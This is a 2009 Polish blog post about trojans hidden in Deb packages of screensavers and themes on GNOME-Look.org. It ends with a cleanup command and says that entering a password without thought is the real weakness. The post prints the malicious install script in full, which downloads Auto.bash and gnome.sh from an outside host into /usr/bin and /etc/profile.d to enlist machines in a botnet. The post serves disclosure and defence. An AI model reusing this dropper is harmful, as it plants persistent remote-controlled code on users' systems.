Bądź: Wyszukaj na stronie z użyciem Google
reklama:

piątek, 11 grudnia 2009

Trojany w ukryte w motywach zagrażają użytkownikom Linuksa

Autor: , 11:00, piątek, 11 grudnia 2009


Jak donoszą użytkownicy z całego świata, razem z niektórymi wygaszaczami i motywami dla Linuksa na GNOME-Look.org można znaleźć niezbyt przyjemny dodatek...

Chodzi o skrypt, który wykonuje się w systemie podczas instalacji z paczki Deb i wygląda następująco:

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit

Bardziej zaawansowani użytkownicy już z pewnością wypatrzyli, że całość modyfikuje plik profile.d co pozwala na przyłączenie naszego systemu do bootnetu i na przykład udział w atakach DDoS czy wykonywaniu innych zleconych mu czynności.

Czy to więc koniec tezy o bezpieczeństwie Linuksa?

Na szczęście nie. Podczas instalacji paczki Deb jesteśmy zmuszeni podać hasło po uzyskaniu którego menedżer pakietów może zrobić z systemem dosłownie wszystko. Bez zezwolenia użytkownika (podania hasła) taka sytuacja nie może mieć miejsca, nie jest to zatem bynajmniej luka w bezpieczeństwie systemu Ubuntu czy ogólnie Linuksów.

Co innego jednak, że ciągłe wpisywanie hasła z czasem zwyczajnie wchodzi nam w krew i przy setnej czy tysięcznej prośbie o jego podanie naturalnym jest, że nie zastanawiamy się nad konsekwencjami.

Jeśli instalowałeś ostatnio pakiety Waterfall ScreenSaver bądź Ninja Black z GNOME-Look.org (które uznawane były za zarażone) odtrutką na skrypt jest wykonanie polecenia:

sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552
Nie należy go jednak wpisywać jeśli nie ma takiej potrzeby.

Jak widać i w Linuksie nie można być całkowicie beztroskim, choć ciężko wyobrazić sobie aby analizować przed instalacją każdy pakiet nie pochodzący z repozytoriów. Na szczęście są przypadki takie jak ten z obecnego wpisu są bardzo odosobnione, gdyż jak wiadomo twórcy wirusów mają znacznie lepsze środowisko do eksperymentów na użytkownikach Windowsa, których jest znacznie więcej.

źródła: omgubuntu.co.uk, ubuntuforums.org, niebezpiecznik.pl
blog comments powered by Disqus

Prześlij komentarz


Popularne posty

Etykiety